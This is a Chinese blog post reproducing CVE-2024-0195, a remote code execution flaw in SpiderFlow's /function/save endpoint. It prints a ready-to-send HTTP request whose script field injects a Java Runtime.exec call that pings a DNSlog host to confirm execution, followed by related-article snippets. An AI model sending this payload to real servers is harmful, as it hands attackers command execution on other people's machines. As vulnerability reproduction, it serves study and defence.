[漏洞复现] SpiderFlow (CVE-2024-0195)

最新推荐文章于 2024-06-26 14:50:46 发布
最新推荐文章于 2024-06-26 14:50:46 发布
阅读量1k 收藏 14
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k5664524/article/details/135526430
版权

前言

 本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

一、漏洞情况分析

SpiderFlow是新一代开源爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发,因此收到很多人的喜欢,在gitee上有7.4K Star。该系统/function/save接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器

二、漏洞复现

进入到you-ip:port/function/save,大概就是这个样子

bp抓包就行了,由于没有bp我们就f12抓一下,构造一下payload

POST /function/save HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+mmazzn.dnslog.cn')%3B%7B

这是我的请求包,然后点击发送

咱们这边dnslog有回显了,下步你们自己慢慢去研究吧

后语:

别乱来

free key
关注
  • 11
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SpiderFlow爬虫平台 前台RCE漏洞复现(CVE-2024-0195
0xSec
01-10 1728
SpiderFlow爬虫平台src/main/java/org/spiderflow/controller/FunctionController.java文件的FunctionService.saveFunction函数中发现了一个被归类为关键的漏洞。该漏洞可导致代码注入,并允许远程发起攻击,可导致服务器失陷。
复现Spider-Flow RCE漏洞(CVE-2024-0195)_16
fushuang333的博客
01-12 1059
复现Spider-Flow RCE漏洞(CVE-2024-0195),Spider Flow 是一个高度灵活可配置的爬虫平台,用户无需编写代码,以流程图的方式,即可实现爬虫。
使用layui框架所遇到的各种坑(连续更新)
06-26 3270
1.tab选项卡模块 有的时候代码正确,element模块也正常引入,但是就是无法切换选项卡,回调函数也不生效 解决方法: 使用谷歌浏览器,查看网络,layui.js是否成功加载 清除浏览器缓存 如果使用thymleaf,设置其缓存为false 重新编译一次工程(我使用的springboot,这种方法鬼神般的生效了,还是静态页面,没有调用服务器) 2.模块的加载问题: 如果使用了多个...
Linux通用系统高危漏洞CVE-2024-1086)修复案例
最新发布
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
06-26 1368
2024年3月28日,监 Linux kernel权限提升漏洞CVE-2024-1086)的PoC/EXP在互联网上公开,该漏洞的CVSS评分为7.8,目前漏洞细节已经公开披露,美国网络安全与基础设施安全局(CISA)6月1日也更新了其已知漏洞(KEV)目录,要求联邦机构在 2024 年 6 月 20 日之前打上补丁,修复追踪编号为 CVE-2024-1086 的 Linux 内核权限提升漏洞。由于该漏洞的公开性,攻击者可能会利用这个漏洞进行恶意攻击,因此建议尽快采取修复措施。
layui bug 踩坑 集锦 (更新)
麦兜仪的博客
04-27 623
layui表单提交请求Ajax的时候被浏览器canceled返回的原因 可能是因为表单提交事件和表单默认提交事件冲突了 因此一定要记得在表单提交的时候 指定一种类型type="button" 如: <button class=" layui-btn" type="button" lay-submit lay-filter="formSubmit" permission="sys:item:addoredit">提交</button> ...
CLTPHP 5.8 后台任意文件删除漏洞
weixin_50464560的博客
09-16 959
CLTPHP 5.8 后台任意文件删除漏洞 一、漏洞简介 CLTPHP是基于ThinkPHP5开发,后台采用Layui框架的内容管理系统, 二、漏洞影响 CLTPHP 5.8及之前版本 三、复现过程 漏洞分析 app/admin/controller/Database.php 第221-248行: public function delSqlFiles() { $batchFlag = input('param.batchFlag', 0, 'intval'); //批量删除 if
CLTPHP 5.5.3 任意文件上传漏洞
weixin_50464560的博客
09-16 1135
一、漏洞简介 CLTPHP采用ThinkPHP开发,后台采用Layui框架的内容管理系统。 二、漏洞影响 CLTPHP 5.5.3 三、复现过程 找到一个注册界面 随便注册一个用户,登陆后在设置里找到一个上传点 上传我们的一句话木马 查看返回包,上传成功 访问失败,猜测返回路径可能不是绝对路径 通过报错信息查找关键词,发现存在public目录 那再把public加上再试试~ success! 菜刀连接 PoC payload.py #!/usr/bin/python #-*- coding:
CVE复现计划】CVE-2024-0195
m0_63138919的博客
04-05 1143
本文以春秋云镜为靶场,进行该CVE-2024-0195漏洞原理学习,记录自己学习过程,还请大佬们师傅们指出文中错误
CVE-2024-0195-SpiderFlow爬虫平台远程命令执行漏洞分析
shelter1234567的博客
01-18 2168
本次我们继续模拟漏洞发掘的思路。此次选择的项目是一个基于springboot的开源项目,该系统/function/save接口存在RCE漏洞
SpiderFlow爬虫平台漏洞利用分析(CVE-2024-0195
蚁景网安学院
01-18 849
SpiderFlow爬虫平台项目中,此漏洞构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷。
CVE-2024-0195SpiderFlow爬虫平台代码执行漏洞复现 [附POC]
薛定谔嘚喵博客
02-02 330
SpiderFlow爬虫平台项目中 spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入
tp5+layui后台基础框架.zip
05-27
最新版本下载地址https://github.com/taoyonbin/php-layui-admin 基本的后台管理框架系统,可以在该基础上进行二次开发,也可以自行改装,内置权限管理/菜单管理/角色管理/管理员管理/系统信息/管理员信息修改/图片上传。 需要注意点:1端口设置,xampp版本没有测过,之前出现版本问题也会导致运行不了 2.数据库的名字和配置文件的名字 3.图片的端口地址
exploit (Linux 内核CVE-2024-1086漏洞复现脚本)
06-06
Linux 内核CVE-2024-1086漏洞复现脚本。 在普通用户下,将文件上传后,chmod 777 exploit ,然后运行 ./exploit ,提权成功,输入id,可看到已经是root权限 。
DirtyCow提权漏洞复现CVE-2016-5195)1
08-08
脏牛(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
Spider-Flow平台 RCE(CVE-2024-0195 RCE漏洞
m0_64366018的博客
01-12 597
SpiderFlow是ssssssss-team开源的一个爬虫平台,以图形化方式定义爬虫流程,不写代码即可完成爬虫。该系统存在RCE漏洞,攻击者构造恶意命令能够利用该漏洞获取服务器权限,导致服务器沦陷。
CVE-2024-0195 利用分析
YJ_12340的博客
01-19 534
SpiderFlow爬虫平台项目中文件的函数调用了函数,该调用了自定义函数,该函数中用户能够控制parameters或script中的内容,从而构造恶意输入来执行任意的 JavaScript 代码,从而导致代码注入,并允许远程发起攻击,可导致服务器失陷。这个项目在Gitee上面有7.4K的Star,有3.6K的fork记录,在实际部署上也不是很少,但是漏洞点出的不是很难主要是思路扩展,适宜入门。
内核CVE-2024-1086漏洞复现脚本
06-19
CVE-2024-1086是一个假设的漏洞编号,因为到目前为止,2024年的CVEs尚未公开,且具体的CVE-2024-1086漏洞详情并未公开。通常情况下,内核漏洞复现脚本是非常复杂的,因为它涉及到Linux内核源代码的深入理解和可能的特定攻击向量。这些脚本可能包括以下步骤: 1. **获取源代码**:首先,你需要从Linux内核的官方git仓库或稳定版本下载相关的内核源代码。 2. **定位漏洞**:查找CVE描述中的相应部分,这通常在`Documentation/`目录下的`security/`或`kernel/`文件夹中。 3. **理解漏洞原理**:阅读漏洞分析报告、补丁和内核代码,理解漏洞是如何利用的。 4. **编写Poc(Proof of Concept)**:根据漏洞原理编写一个简单的程序或脚本来模拟攻击条件。 5. **执行复现**:在构建好的内核环境中运行这个Poc,看是否能触发预期的漏洞行为。 由于这是理论情况,并且实际的漏洞复现脚本通常不会公开,因为它们可能被用于恶意目的,所以你可能需要查阅官方安全公告、安全研究者发布的详细指南或者等待官方补丁发布后才能获得更多信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值